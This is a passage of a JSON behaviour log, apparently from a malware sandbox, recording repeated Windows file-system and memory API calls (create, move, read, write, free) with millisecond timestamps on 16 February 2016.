"timestamp": "2016-02-16 17:41:43,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,685", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,725", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,735", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,745", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,775", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,945", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,975", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,975", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,985", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,995", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,005", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,005", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,015", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,015", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,025", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,025", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,025", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,035", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,035", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,045", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,045", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 